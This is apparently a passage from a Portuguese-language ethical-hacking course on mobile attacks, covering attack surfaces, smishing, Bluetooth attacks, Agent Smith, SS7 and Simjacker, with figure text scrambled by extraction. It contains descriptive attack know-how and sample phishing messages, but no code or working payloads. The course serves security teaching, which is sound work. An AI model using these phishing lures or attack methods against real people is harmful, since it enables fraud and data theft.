Os métodos de ataque baseados no sistema operacional são os seguintes:
• Sem senha/senha fraca: Muitos usuários optam por não definir uma senha ou usar um PIN fraco, senha ou
padrão de bloqueio, que um invasor pode facilmente adivinhar ou decifrar para comprometer dados
confidenciais armazenados no dispositivo móvel.

• Jailbreaking do iOS: O jailbreak do iOS é o processo de remoção dos mecanismos de segurança definidos pela
Apple para evitar que códigos maliciosos sejam executados no dispositivo.
Ele fornece acesso root ao sistema operacional e remove as restrições da sandbox. Portanto, o jailbreak
envolve muitos riscos de segurança, bem como outros riscos para dispositivos iOS, incluindo baixo
desempenho, infecção por malware e assim por diante.
• Enraizamento do Android: O enraizamento permite que os usuários do Android obtenham controle privilegiado
(conhecido como “acesso root”) dentro do subsistema do Android. Assim como o jailbreak, o rooting pode
resultar na exposição de dados confidenciais armazenados no dispositivo móvel.
• Cache de dados do sistema operacional: um cache do sistema operacional armazena dados/informações

usados na memória temporariamente no disco rígido. Um invasor pode despejar essa memória reiniciando o
dispositivo da vítima com um sistema operacional malicioso e extraindo dados confidenciais da memória
despejada.
• Senhas e dados acessíveis: os dispositivos iOS armazenam senhas e dados criptografados usando algoritmos
criptográficos que possuem certas vulnerabilidades conhecidas. Os invasores exploram essas vulnerabilidades
para descriptografar as Chaves do dispositivo, expondo senhas de usuários, chaves de criptografia e outros
dados privados.
• Software carregado pela operadora: software ou aplicativos pré-instalados em dispositivos podem conter
vulnerabilidades que um invasor pode explorar para executar atividades maliciosas, como excluir, modificar
ou roubar dados no dispositivo, espionar chamadas e
em breve.
• Código iniciado pelo usuário: O código iniciado pelo usuário é uma atividade que induz a vítima a instalar
aplicativos mal-intencionados ou clicar em links que permitem que um invasor instale um código mal-
intencionado para explorar o navegador, os cookies e as permissões de segurança do usuário.
Outros métodos de ataque baseados em sistema operacional incluem criptografia fraca/nenhuma, ataque de
deputado confuso, TEE/processador de enclave seguro, vazamento de canal lateral, analisadores de formatos de
multimídia/arquivo, vulnerabilidades de driver de kernel, recurso DoS, falsificação de GPS, bloqueio de dispositivo
e assim por diante .
ÿ A Rede
Os métodos de ataque baseados em rede são os seguintes:
o Wi-Fi (criptografia fraca/sem criptografia): alguns aplicativos não conseguem criptografar dados ou usam algoritmos
fracos para criptografar dados para transmissão em redes sem fio. Um invasor pode interceptar os dados
espionando a conexão sem fio.
Embora muitos aplicativos usem SSL/TLS, que oferece proteção para dados em trânsito, ataques contra esses
algoritmos podem expor informações confidenciais dos usuários.
o Pontos de acesso não autorizados: os invasores instalam um ponto de acesso sem fio ilícito por meios físicos, o
que lhes permite acessar uma rede protegida sequestrando as conexões de usuários legítimos da rede.

o Packet Sniffing: Um invasor usa ferramentas de sniffing, como Wireshark e Capsa Network Analyzer, para capturar e
analisar todos os pacotes de dados no tráfego de rede, que geralmente incluem dados confidenciais, como
credenciais de login enviadas em texto não criptografado.
o Man-in-the-Middle (MITM): Os invasores espionam as conexões de rede existentes entre dois sistemas, invadem
essas conexões e, em seguida, leem ou modificam os dados ou inserem dados fraudulentos na comunicação
interceptada.
o Seqüestro de sessão: Os invasores roubam IDs de sessão válidos e os usam para obter acesso não autorizado às
informações do usuário e da rede.
o DNS Poisoning: Os invasores exploram os servidores DNS da rede, resultando na substituição de endereços IP falsos
no nível do DNS. Assim, os usuários do site são direcionados para outro site de escolha do invasor.
o SSLStrip: SSLStrip é um tipo de ataque MITM no qual os invasores exploram vulnerabilidades na implementação de
SSL/TLS em sites. Ele depende do usuário validar a presença da conexão HTTPS. O ataque reduz invisivelmente
as conexões para HTTP sem criptografia, o que é difícil para os usuários detectarem em navegadores móveis.
o Certificados SSL falsos: certificados SSL falsos representam outro tipo de ataque MITM no qual um invasor emite um
certificado SSL falso para interceptar o tráfego em uma conexão HTTPS supostamente segura.
Outros métodos de ataque baseados em rede incluem sequestro de BGP, proxies HTTP, etc.
ÿ O Data Center/CLOUD
Os datacenters têm dois pontos principais de entrada: um servidor web e um banco de dados.
o Ataques baseados em servidor web
Vulnerabilidades e ataques baseados em servidor da Web são dos seguintes tipos:
• Vulnerabilidades de plataforma: os invasores exploram vulnerabilidades no sistema operacional, software de

servidor como IIS ou módulos de aplicativos em execução no servidor da web.
Às vezes, os invasores podem expor vulnerabilidades associadas ao protocolo ou controles de acesso
monitorando a comunicação estabelecida entre um dispositivo móvel e um servidor web.
• Configuração incorreta do servidor : um servidor da Web configurado incorretamente pode permitir que um invasor
obter acesso não autorizado aos seus recursos.
• Cross-site Scripting (XSS): os ataques XSS exploram vulnerabilidades em páginas da Web geradas
dinamicamente, o que permite que invasores mal-intencionados injetem scripts do lado do cliente em páginas
da Web visualizadas por outros usuários. Esses ataques ocorrem quando dados de entrada invalidados são
incluídos no conteúdo dinâmico enviado ao navegador da Web do usuário para renderização. Os invasores
injetam JavaScript, VBScript, ActiveX, HTML ou Flash maliciosos para execução no sistema da vítima,
ocultando-os em solicitações legítimas.

• Cross-Site Request Forgery (CSRF): ataques CSRF exploram vulnerabilidades de páginas da Web que permitem
que um invasor force o navegador de um usuário desavisado a enviar solicitações maliciosas não intencionais. A
vítima mantém uma sessão ativa com um site confiável e simultaneamente visita um site malicioso que injeta uma
solicitação HTTP para o site confiável em sua sessão, comprometendo sua integridade.
• Validação de entrada fraca: os serviços da Web confiam excessivamente na entrada de aplicativos móveis,
dependendo do aplicativo para executar a validação de entrada. No entanto, os invasores podem forjar sua
própria comunicação com o servidor da Web ou contornar as verificações lógicas do aplicativo, permitindo que
eles aproveitem a lógica de validação ausente no servidor para executar ações não autorizadas.
Os invasores exploram as falhas de validação de entrada para que possam executar scripts entre sites, estouro
de buffer, ataques de injeção e assim por diante, o que leva ao roubo de dados e mau funcionamento do sistema.
• Ataques de força bruta: Os invasores adotam a abordagem de tentativa e erro para adivinhar a entrada válida para
um determinado campo. Aplicativos que permitem qualquer número de tentativas de entrada geralmente são
propensos a ataques de força bruta.
Outras vulnerabilidades e ataques baseados em servidor da Web incluem compartilhamento de recursos de

origem cruzada, ataque de canal lateral, ataque de hipervisor, VPN e assim por diante.
o Ataques de banco de dados
Vulnerabilidades e ataques baseados em banco de dados são dos seguintes tipos:
• Injeção de SQL : A injeção de SQL é uma técnica usada para tirar proveito de vulnerabilidades de entrada não
validadas para passar comandos SQL por meio de um aplicativo da Web para execução por um banco de dados
de back-end. É um ataque básico usado para obter acesso não autorizado a um banco de dados ou para recuperar
informações diretamente do banco de dados.
• Escalação de privilégios: ocorre quando um ataque aproveita alguma exploração para obter acesso de alto nível,
resultando no roubo de dados confidenciais armazenados no banco de dados.
• Despejo de dados: um invasor faz com que o banco de dados descarregue alguns ou todos os seus dados,
revelando assim registros confidenciais.
• Execução de comandos do sistema operacional: um invasor injeta comandos no nível do sistema operacional em
uma consulta, fazendo com que determinados sistemas de banco de dados executem esses comandos no servidor.
Assim, o invasor pode obter acesso irrestrito/no nível da raiz ao sistema.

Como um hacker pode lucrar com dispositivos móveis 1.189 797

Dispositivos comprometidos com sucesso Pacotes
de
instalação maliciosos
Vigilância Financeiro
áudio Enviando SMS de taxa premium
mensagens
Câmera
Roubo de transação
Registro de chamadas
Números de autenticação
Localização (Atualmente)
mensagens SMS Extorsão via ransomware 6063

antivírus falso
Móvel
Representação
Fazendo ligações caras ransomware
redirecionamento de SMS
Cavalos de Tróia
Enviando mensagens de e-mail
Roubo de dados Atividade de botnet
Postando nas redes sociais
Detalhes da conta
Lançamento de ataques DDoS
Contatos
clique em fraude
Enviando SMS de taxa premium

Número de telefone
mensagens
Roubar dados via aplicativo

vulnerabilidades 39.051
roubo de celular internacional
Banco
Número de identificação do equipamento
móvel
(IMEI)
Cavalos de Tróia
https:// www.sophos.com https:// securelist.com
Como um hacker pode lucrar com dispositivos móveis que são bem-sucedidos
comprometido
Fonte: https:// www.sophos.com, https:// securelist.com
Atualmente, imagens, listas de contatos, aplicativos bancários, aplicativos de mídia social, contas de e-mail,
informações financeiras, informações comerciais e assim por diante residem em nossos smartphones. Assim,
os smartphones são um tesouro de informações para exploração potencial por invasores.
Os dispositivos Android são particularmente propensos a serem hackeados, pois representam a maior parte do
mercado móvel.
Ao comprometer um smartphone, um invasor pode espionar as atividades do usuário, usar indevidamente as

informações confidenciais roubadas, representar o usuário postando em suas contas de mídia social ou
inscrever o dispositivo em um botnet (uma rede de muitos smartphones hackeados).

Depois de comprometer com sucesso o dispositivo móvel, os hackers podem explorar o seguinte:
Vigilância Financeiro Roubo de dados Representação de atividade de botnet
Envio de mensagens Lançamento de SMS

áudio Detalhes da conta
SMS de tarifa premium ataques DDoS redirecionamento
Câmera antivírus falso Contatos clique em fraude Enviar e-mails
Fazendo ligações caras Registros de chamadas e Envio de mensagens Postando nas

número de telefone SMS de tarifa premium redes sociais
Extorsão via Roubo de dados por meio de

Localização
ransomware vulnerabilidades de aplicativos
Roubando
Roubo de transação
SMS celular internacional
Autenticação
mensagens Identidade do Equipamento
Números (TANs)
Número (IMEI)
Tabela 9.1: Lista de informações que os hackers podem explorar

Fluxo do módulo
Vetores e Vulnerabilidades
02 03 Conceito de Gerenciamento (MDM)

Anatomia de ataque
01 04 Contramedidas
Discutir vetores e vulnerabilidades de ataque de plataforma móvel
Esta seção discute vetores de ataque móvel, vulnerabilidades e riscos associados, problemas de segurança
decorrentes de lojas de aplicativos, problemas de sandboxing de aplicativos, spam móvel, emparelhamento de
dispositivos móveis em conexões Bluetooth e Wi-Fi abertas e outros ataques móveis.

Vetores de ataque móvel
1 2
Malware adulteração de dados
Vírus e rootkit Modificação por outro aplicativo
Modificação do aplicativo Tentativas de adulteração não detectadas
modificação do sistema operacional Dispositivo desbloqueado
3 4
Exfiltração de dados Perda de dados
Extraído de fluxos de dados e e-mail Vulnerabilidades de aplicativos
Tela de impressão e raspagem de tela Acesso físico não aprovado
Copiar para chave USB e perda de backup Perda de dispositivo
Vetores de ataque móvel
Os dispositivos móveis têm atraído a atenção dos invasores devido ao seu uso generalizado. Esses dispositivos
acessam muitos dos recursos usados pelos computadores tradicionais. Além disso, esses dispositivos possuem
alguns recursos exclusivos que levaram ao surgimento de novos vetores e protocolos de ataque. Esses vetores
tornam as plataformas de telefonia móvel suscetíveis a ataques mal-intencionados, tanto da rede quanto do
comprometimento físico. Abaixo estão alguns dos vetores de ataque que permitem que um invasor explore
vulnerabilidades no sistema operacional móvel, firmware do dispositivo ou aplicativos móveis.
Malware Exfiltração de dados adulteração de dados Perda de Dados
Extraído de dados Modificação por Vulnerabilidades

Vírus e rootkit
fluxos e e-mail outro aplicativo de aplicativos
Modificação Imprimir tela e tela Tentativas de adulteração físico não aprovado

do aplicativo raspagem não detectadas Acesso
Copiar para chave USB

modificação do sistema operacional Dispositivo desbloqueado Perda de dispositivo
e perda de backup
Tabela 9.2: Lista de vetores de ataque

Vulnerabilidades e riscos da plataforma móvel
1 Aplicativos maliciosos em lojas 7 Vulnerabilidades de aplicativos móveis
2 Malware Móvel 8 Problemas de privacidade (geolocalização)
3 Vulnerabilidades de sandbox de aplicativos 9 Segurança de dados fraca
4 Dispositivo fraco e criptografia de aplicativo 10 Permissões excessivas
5 Problemas de atualização do SO e do aplicativo 11 Segurança de comunicação fraca
6 Jailbreak e root 12 Ataques Físicos
Vulnerabilidades e riscos da plataforma móvel
O uso crescente de smartphones com recursos tecnológicos em constante evolução tornou a segurança de dispositivos
móveis uma preocupação de segurança primária para o setor de TI. Os dispositivos móveis estão se tornando alvos
privilegiados para criminosos cibernéticos devido a melhorias significativas no sistema operacional móvel e no hardware.
Além disso, os aprimoramentos nos recursos do smartphone introduzem novos tipos de preocupações de segurança. Como
os smartphones estão superando os PCs como dispositivos preferidos para acessar a Internet, gerenciar comunicações e
assim por diante, os invasores são mais atraídos por pesquisas móveis e implementam possíveis esquemas de ataque
contra plataformas móveis para comprometer a segurança e a privacidade dos usuários ou até mesmo obter controle total
sobre as vítimas ' dispositivos.
Algumas vulnerabilidades e riscos da plataforma móvel estão listados abaixo:
ÿ Aplicativos maliciosos nas lojas ÿ Fraca segurança de dados
ÿ Malware móvel ÿ Permissões excessivas
ÿ Vulnerabilidades de sandboxing de aplicativos ÿ Fraca segurança de comunicação
ÿ Dispositivo fraco e criptografia de aplicativo ÿ Ataques físicos
ÿ Problemas de atualização do sistema operacional e do aplicativo ÿ Ofuscação de código insuficiente
ÿ Jailbreak e rooting ÿ Segurança insuficiente da camada de transporte
ÿ Vulnerabilidades de aplicativos móveis ÿ Expiração de sessão insuficiente
ÿ Questões de privacidade (Geolocalização)

Problemas de segurança decorrentes das lojas de aplicativos
1 A verificação insuficiente ou nenhuma verificação de aplicativos leva à entrada de aplicativos maliciosos e falsos no mercado de aplicativos
2 Lojas de aplicativos são alvos comuns de invasores para distribuir malware e aplicativos maliciosos
3 Aplicativos maliciosos podem danificar outros aplicativos e dados e enviar seus dados confidenciais para invasores
Oficial
Loja de aplicativos
Móvel
Atacante
Do utilizador
Terceiro
Loja de aplicativos
Aplicativo móvel Sem verificação
Aplicativo malicioso envia dados confidenciais ao invasor
Registros de chamadas/fotos/vídeos/documentos confidenciais
Problemas de segurança decorrentes das lojas de aplicativos
Aplicativos móveis são programas de computador projetados para serem executados em smartphones, tablets e outros
dispositivos móveis. Esses aplicativos incluem mensagens de texto, e-mail, reprodução de vídeos e música, gravação de
voz, jogos, serviços bancários, compras e assim por diante. Em geral, os aplicativos são disponibilizados por meio de
plataformas de distribuição de aplicativos, que podem ser lojas de aplicativos oficiais operadas pelos proprietários do
sistema operacional móvel, como a App Store da Apple, a loja de aplicativos do Google Play e a Microsoft App Store, ou
lojas de aplicativos de terceiros, como Amazon Appstore, GetJar e APKMirror.
As lojas de aplicativos são alvos comuns de invasores que procuram distribuir malware e aplicativos maliciosos. Os
invasores podem baixar um aplicativo legítimo, reempacotá-lo com malware e carregá-lo em uma loja de aplicativos de
terceiros, da qual os usuários o baixam, considerando-o genuíno. Aplicativos maliciosos instalados nos sistemas do usuário
podem danificar outros aplicativos ou dados armazenados e enviar dados confidenciais, como registros de chamadas,
fotos, vídeos, documentos confidenciais e assim por diante, ao invasor sem o conhecimento dos usuários. Os invasores
podem usar as informações coletadas para explorar os dispositivos e lançar novos ataques. Os invasores também podem
realizar engenharia social, o que força os usuários a baixar e executar aplicativos fora das lojas de aplicativos oficiais. A
verificação insuficiente ou inexistente de aplicativos geralmente leva à entrada de aplicativos maliciosos e falsos no
mercado. Aplicativos maliciosos podem danificar outros aplicativos e dados e enviar dados confidenciais dos usuários para
invasores.
Figura 9.3: Problemas de segurança decorrentes das App Stores

Problemas de sandbox do aplicativo
ÿ Sandboxing ajuda a proteger sistemas e usuários , limitando os recursos que o aplicativo pode acessar
para a plataforma móvel; no entanto, aplicativos mal-intencionados podem explorar vulnerabilidades e
ignorar o sandbox
Ambiente seguro de sandbox Ambiente Sandbox Vulnerável
Outro Outro
Dados do usuário
S Dados do usuário
S
UMA UMA
Dados do usuário Dados do usuário
N N
irrestrito irrestrito
Sem acesso D Acesso D
Acesso Acesso
B Ignorar B
O a caixa de areia
Aplicativo
O Aplicativo
Outro Outro
x x
Sistema Sistema
Recursos Recursos
Recursos do sistema Recursos do sistema
Problemas de sandbox do aplicativo
Os smartphones estão atraindo cada vez mais a atenção dos cibercriminosos. Os desenvolvedores de aplicativos móveis
devem entender a ameaça à segurança e à privacidade dos dispositivos móveis executando um aplicativo sem sandbox e
devem desenvolver aplicativos com sandbox de acordo.
A sandboxing de aplicativos é um mecanismo de segurança que ajuda a proteger sistemas e usuários, limitando os recursos
que um aplicativo pode acessar para sua funcionalidade pretendida na plataforma móvel. Frequentemente, o sandbox é útil
na execução de códigos não testados ou programas não confiáveis de terceiros, fornecedores, usuários e sites não
verificados ou não confiáveis. Isso aumenta a segurança isolando o aplicativo para impedir que intrusos, recursos do
sistema, malware, como cavalos de Tróia e vírus, e outros aplicativos interajam com ele. Como o sandbox isola os aplicativos
uns dos outros, ele os protege contra adulterações entre si; no entanto, aplicativos mal-intencionados podem explorar
vulnerabilidades e ignorar a caixa de proteção.
Um ambiente de sandbox seguro fornece um aplicativo com privilégios limitados destinados a sua funcionalidade para
impedi-lo de acessar dados de outros usuários e recursos do sistema, enquanto um ambiente de sandbox vulnerável permite
que um aplicativo mal-intencionado explore vulnerabilidades no sandbox e viole seu perímetro, resultando na exploração de
outros dados e sistema
Recursos.

Figura 9.4: Problemas de sandbox do aplicativo

Parabéns!!!
customersupport@walmart.com
Para: abc.123@gmail.com
Prezado comprador do
Walmart, Parabéns, você ganhou
Spam móvel
um vale-presente Walmart de $ 2.000.
Clique aqui para reivindicar
seu presente. www.WmarkClick.com/price.html
Esta é uma caixa de e-mail genérica. Por favor, não responda a isso.
Para cancelar a assinatura, clique neste link para ligar para o nosso
telefone bancário e se cadastrar no não perturbe.``
Mensagens de As mensagens de spam Uma quantidade Ataques de spam

texto/e-mail não contêm anúncios ou significativa de são realizados para
solicitadas enviadas para links maliciosos que largura de banda ganho financeiro
dispositivos móveis de podem induzir os é desperdiçada
número de telefone usuários a revelar por mensagens

conhecido/desconhecido informações confidenciais de spam
e IDs de e- mail
Spam móvel
Atualmente, os telefones celulares são amplamente utilizados para fins pessoais e comerciais. Spam é um termo genérico
para mensagens não solicitadas enviadas por meio de tecnologias de comunicação eletrônica, como SMS, MMS,
mensagens instantâneas (IM) e e-mail.
Spam de telefone celular, também conhecido como spam de SMS, spam de texto ou m-spam, refere-se a mensagens não
solicitadas enviadas em massa para números de telefone/IDs de e-mail conhecidos/desconhecidos para atingir telefones
celulares.
As mensagens de spam típicas enviadas para telefones celulares são as seguintes:
ÿ Mensagens contendo anúncios ou links maliciosos que podem induzir os usuários a revelar
informação confidencial
ÿ Mensagens comerciais atraentes anunciando produtos/serviços
ÿ Mensagens SMS ou MMS alegando que a vítima ganhou um prémio e pedindo-lhe para fazer uma chamada para
um número de serviço telefónico de valor acrescentado fornecido para obter mais detalhes
ÿ Links maliciosos que podem induzir os usuários a divulgar dados pessoais ou corporativos confidenciais
ÿ Mensagens de phishing que induzem o destinatário a revelar dados pessoais ou financeiros, como nome, endereço,
data de nascimento, número da conta bancária, número do cartão de crédito e assim por diante, que um invasor
pode usar para cometer identidade ou fraude financeira
As mensagens de spam consomem uma quantidade significativa de largura de banda da rede. As consequências do spam
móvel incluem perda financeira, injeção de malware e incidentes de violação de dados corporativos.

Figura 9.5: Exemplo de mensagem de spam

Ataque de phishing por SMS (SMiShing)

(Varredura de ataque direcionado)
ÿ SMS Phishing é o ato de tentar adquirir informações pessoais e financeiras enviando SMSs
(mensagens instantâneas ou mensagens instantâneas) contendo links enganosos
Atacante compra
SIM pré-pago Parabéns!!!
cartão
Querido, Você
Envia isca SMS ganhou na loteria de 1 milhão.
Acesse www.rij.com/
abc.h tml para
reivindicar seu preço.
Atacante Do utilizador
Parabéns!!!
O usuário clica no
Você ganhou o preço
Nome: link e redireciona para

Número de Ph.:
o site de phishing
Número da Segurança Social.:
Carregamento de página Data de nascimento: O usuário

Cartão de Crédito No.:
distribuído e invasor fornece as
PIN do cartão de crédito:
obtém as informações informações pessoais e financeiras
Ataque de phishing por SMS (SMiShing) (varredura de ataque direcionado)
As mensagens de texto são a comunicação sem voz mais comum nos telefones celulares. Usuários de todo o
mundo enviam e recebem bilhões de mensagens de texto diariamente. Uma quantidade tão grande de dados
acarreta um aumento nos ataques de spam ou phishing.
SMS phishing (também conhecido como SMiShing) é um tipo de fraude de phishing em que um invasor usa
sistemas SMS para enviar mensagens de texto falsas. É o ato de tentar adquirir informações pessoais e financeiras
enviando SMS (ou IM) contendo links enganosos. Muitas vezes, essas mensagens de texto falsas contêm um URL
de site ou número de telefone enganoso para induzir as vítimas a revelar suas informações pessoais ou financeiras,
como SSNs, números de cartão de crédito e nome de usuário e senha de banco online. Além disso, os invasores
implementam o SMiShing para infectar os telefones celulares das vítimas e as redes associadas com malware.
Os invasores compram um cartão SMS pré-pago usando uma identidade falsa. Em seguida, eles enviam uma isca de SMS para um usuário.
O SMS pode parecer atraente ou urgente. Por exemplo, pode incluir uma mensagem de loteria, vale-presente,
compra online ou notificação de suspensão de conta, juntamente com um link ou número de telefone malicioso. Ao
clicar no link, considerando-o legítimo, o usuário é redirecionado para o site de phishing do invasor, onde fornece
as informações solicitadas (por exemplo, nome, número de telefone, data de nascimento, número do cartão de
crédito ou PIN, código CVV, SNN e endereço de e-mail). O invasor pode usar as informações adquiridas para
realizar atividades maliciosas, como roubo de identidade, compras online e assim por diante.

Figura 9.6: Processo de SMS Phishing

Por que o SMS Phishing é eficaz?

A maioria dos consumidores acessa a Internet por meio de
01 um celular
02 Fácil de configurar uma campanha de phishing móvel
Difícil de detectar e parar antes do dano já causado

03
Os usuários móveis não estão condicionados a receber

04 mensagens de texto de spam em seus celulares
Nenhum mecanismo convencional para eliminar SMSs

05 de spam
06 Poucos antivírus móveis verificam SMSs
Por que o SMS Phishing é eficaz?
ÿ A maioria dos consumidores acessa a Internet por meio de um dispositivo móvel.
ÿ Fácil de configurar uma campanha de phishing móvel.
ÿ Difícil de detectar e parar causa danos.
ÿ Os usuários móveis não estão condicionados a receber mensagens de texto spam em seus celulares
dispositivos.
ÿ Nenhum mecanismo convencional para eliminar SMS de spam.
ÿ A maioria das ferramentas antivírus móveis não verifica o SMS.

Exemplos de ataques de phishing por SMS
ALERTA!!!
ALERTA!!!
Caro Banco Westpac
Cliente,
Detectamos alguma Parabéns!!!
atividade incomum. Pedimos com PAYPAL – Sua conta foi

urgência que você revise sua bloqueada Atualizar!!!
conta clicando no link abaixo: Clique no link abaixo para restaurar Prezado, Você foi selecionado para
seu acesso http://certifiedhacker.com/ um vale-presente da Amazon de US$ 2.000.
www.westpacbank.com/revi 3/ Digite o código “Grátis”

Querido cliente,
ew.html c em http://www.AmaZon.com/w
m Seu cartão nº 256385XXXXXX
Para reclamar o seu

foi desativado temporariamente.
preço. faltam 150!
Para ativar, ligue: 205-358-5689
Exemplos de ataques de phishing por SMS
Figura 9.7: Exemplos de SMS Phishing

Emparelhar dispositivos móveis em aberto

Conexões Bluetooth e Wi-Fi
ÿ O emparelhamento de dispositivos móveis em conexões abertas (Wi-Fi público/roteadores Wi-Fi não
criptografados) permite que invasores escutem e interceptem a transmissão de dados usando técnicas como;
ÿ Bluesnarfing (roubo de informações via Bluetooth)
ÿ Bluebugging (ganhar controle sobre o dispositivo via Bluetooth)
ÿ Compartilhar dados de dispositivos maliciosos pode infectar/violar dados no dispositivo destinatário
Ataque Bluebug
emparelhado
Dispositivos Bluetooth
Internet
Usuários legítimos Usuários legítimos WLAN

Computador portátil
Ponto de acesso
Atacante entra em Bluetooth

alcance e intercepta a
transmissão de dados
Atacante
Ponto de acesso do atacante
Emparelhar dispositivos móveis em conexões Bluetooth e Wi-Fi abertas
Configurar a conexão Bluetooth de um dispositivo móvel para o modo “aberto” ou “descoberta” e ativar o
recurso de conexão Wi-Fi automática, principalmente em locais públicos, representam riscos significativos
para os dispositivos móveis. Os invasores exploram essas configurações para infectar um dispositivo móvel
com malware, como vírus e cavalos de Tróia, ou comprometer dados não criptografados transmitidos por
redes não confiáveis. Eles podem induzir as vítimas a aceitar uma solicitação de conexão Bluetooth de um
dispositivo malicioso ou podem executar um ataque MITM para interceptar e comprometer todos os dados
enviados de e para os dispositivos conectados. Usando as informações coletadas, os invasores podem se
envolver em fraudes de identidade e outras atividades maliciosas, colocando assim os usuários em grande risco.
Técnicas como “bluesnarfing” e “bluebugging” ajudam um invasor a escutar ou interceptar a transmissão de

dados entre dispositivos móveis emparelhados em conexões abertas (por exemplo, Wi-Fi público ou
roteadores Wi-Fi não criptografados).
ÿ Bluesnarfing (Roubar informações via Bluetooth)
Bluesnarfing é o roubo de informações de um dispositivo sem fio por meio de uma conexão Bluetooth,
geralmente entre telefones, desktops, laptops, PDAs e outros dispositivos. Essa técnica permite que
um invasor acesse a lista de contatos, e-mails, mensagens de texto, fotos, vídeos e dados comerciais
da vítima armazenados no dispositivo.
Qualquer dispositivo com sua conexão Bluetooth ativada e definida como “detectável” (permitindo
que outros dispositivos Bluetooth dentro do alcance visualizem o dispositivo) pode ser suscetível ao
bluesnarfing se o software do fornecedor contiver uma certa vulnerabilidade. O Bluesnarfing explora
as conexões Bluetooth de outras pessoas sem o conhecimento delas.

ÿ Bluebugging (Assumindo o controle de um dispositivo via Bluetooth)
Bluebugging envolve obter acesso remoto a um dispositivo habilitado para Bluetooth e usar seus recursos sem o
conhecimento ou consentimento da vítima. Os invasores comprometem a segurança do dispositivo de destino para
realizar um ataque backdoor antes de devolver o controle ao seu proprietário. O Bluebugging permite que os invasores
farejem dados corporativos ou pessoais confidenciais, recebam chamadas e mensagens de texto destinadas à vítima,
interceptem chamadas e mensagens telefônicas, encaminhem chamadas e mensagens, conectem-se à Internet e
executem outras atividades maliciosas, como acessar listas de contatos, fotos, e vídeos.
Figura 9.8: Ataque Bluebug

Ataque do Agente Smith

ÿ Um ataque do Agent Smith é realizado persuadindo a vítima a instalar um aplicativo malicioso projetado e publicado
por um invasor
ÿ O aplicativo malicioso substitui aplicativos legítimos, como WhatsApp, SHAREit e MX Player
ÿ O invasor produz um grande volume de anúncios no dispositivo da vítima por meio de

o aplicativo infectado para ganhos financeiros
O invasor instala um aplicativo móvel O usuário baixa e instala o aplicativo
malicioso em uma loja de aplicativos de terceiros móvel malicioso

Do utilizador
Atacante Aplicativo de terceiros
Armazenar
O aplicativo malicioso
infecta ou substitui os
aplicativos legítimos no
dispositivo do usuário com o
comando C&C
Explora aplicativos infectados para Celular do usuário bombardeado com

roubar informações críticas anúncios irrelevantes
Do utilizador
Do utilizador
Ataque do Agente Smith
Os ataques do Agent Smith são realizados atraindo as vítimas para que baixem e instalem aplicativos maliciosos
projetados e publicados por invasores na forma de jogos, editores de fotos ou outras ferramentas atraentes de lojas
de aplicativos de terceiros, como 9Apps. Depois que o usuário instala o aplicativo, o código malicioso principal
dentro do aplicativo infecta ou substitui os aplicativos legítimos nos comandos C&C do dispositivo móvel da vítima.
O aplicativo enganoso substitui aplicativos legítimos como WhatsApp, SHAREit e MX Player por versões infectadas
semelhantes. Às vezes, o aplicativo também parece ser um produto Google autêntico, como o Google Updater ou
Themes. O invasor então produz um grande volume de anúncios irrelevantes e fraudulentos no dispositivo da vítima
por meio do aplicativo infectado para obter ganhos financeiros. Os invasores exploram esses aplicativos para roubar
informações críticas, como informações pessoais, credenciais e dados bancários, do dispositivo móvel da vítima por
meio de comandos C&C.
Figura 9.9: Ataque do Agente Smith

Explorando a vulnerabilidade do SS7

Signalling System 7 (SS7) é um protocolo de comunicação que permite aos usuários móveis trocar
comunicação através de outra rede celular
O SS7 é operado dependendo da confiança mútua entre os operadores sem

qualquer autenticação
Os invasores podem explorar essa vulnerabilidade para realizar um ataque man-in-the-middle,

impedindo as mensagens de texto e chamadas entre os dispositivos de comunicação
Usuário
tentando acessar outra rede
SS7
Usuário com celular Rede móvel

em local remoto O invasor intercepta chamadas
ou mensagens de texto
Atacante
Explorando a vulnerabilidade do SS7
O Signaling System 7 (SS7) é um protocolo de comunicação que permite aos usuários móveis trocar
comunicação por meio de outra rede celular (especialmente quando em roaming). Os dispositivos móveis
devem ser transportados em diferentes locais para atender seus usuários. A troca de operadora de
telecomunicações ou o uso da rede de outra torre de celular é permitido através do protocolo SS7. Este
mecanismo de sinalização é operado em função da confiança mútua entre os operadores, sem qualquer
verificação de autenticação. Como a rede de sinalização SS7 não é isolada, o invasor pode explorar essa
vulnerabilidade para executar um ataque MITM impedindo mensagens de texto e chamadas entre os dispositivos
de comunicação. O invasor pode espionar credenciais bancárias, OTPs e outras informações confidenciais
roteadas pela rede. Essa vulnerabilidade no SS7 também pode permitir que o invasor ignore a autenticação de
dois fatores e a criptografia de ponta a ponta via SMS.
Ameaças associadas à vulnerabilidade SS7
Quando o invasor obtém acesso ao protocolo SS7, o dispositivo da vítima enfrenta os seguintes riscos:
ÿ Expor a identidade do subscritor
ÿ Revelar a identidade da rede
ÿ Espionar e interceptar a rede para roubar dados pessoais
ÿ Permitir escutas telefónicas
ÿ Realização de ataques DoS para prejudicar a reputação da operadora de telecomunicações alvo
ÿ Rastreamento de localizações geográficas

Figura 9.10: Explorando a vulnerabilidade SS7

Simjacker é uma vulnerabilidade associada ao navegador S@T de um cartão

SIM, um software pré-instalado em cartões SIM projetado para fornecer um
Simjacker: conjunto de instruções
Cartão SIM
Os invasores exploram o Simjacker para realizar várias atividades maliciosas, como
Ataque capturar a localização de dispositivos, monitorar chamadas, forçar navegadores de
dispositivos a se conectarem a sites maliciosos e realizar ataques DoS
sim
cartão
Envia malicioso Dispositivo

código por SMS
localização? 010
100
010
010
SMS contendo ID do celular
100 ID da célula e localização do celular
Dispositivo do atacante Dispositivo cúmplice
010
Mandar
SMS
Processo dentro do celular da vítima
Simjacker: ataque ao cartão SIM
O Simjacker é uma vulnerabilidade associada ao navegador S@T de um cartão SIM (SIMalliance Toolbox Browser),
um software pré-instalado incorporado nos cartões SIM para fornecer um conjunto de instruções.
Os invasores exploram essa vulnerabilidade no navegador S@T para realizar várias atividades maliciosas, como
capturar a localização do dispositivo, monitorar chamadas, coletar informações como IMEI, fazer chamadas
fraudulentas ou caras, enviar mensagens de tarifa premium, forçar o navegador do dispositivo a se conectar a sites
maliciosos e realizando ataques DoS para bloquear cartões SIM. O ataque baseado no cartão SIM pode ser agravado
com base no dispositivo da vítima. O ataque do Simjacker é iniciado enviando um código semelhante a um spyware
na forma de configurações do sistema ou do cartão SIM por meio de um SMS para assumir o controle total do cartão
SIM e do dispositivo móvel para emitir vários comandos sem a interação do usuário.
Etapas envolvidas no ataque do Simjacker
ÿ O atacante envia SMS fraudulento contendo código oculto ou instruções de um SIM

Kit de ferramentas de aplicativos (STK)
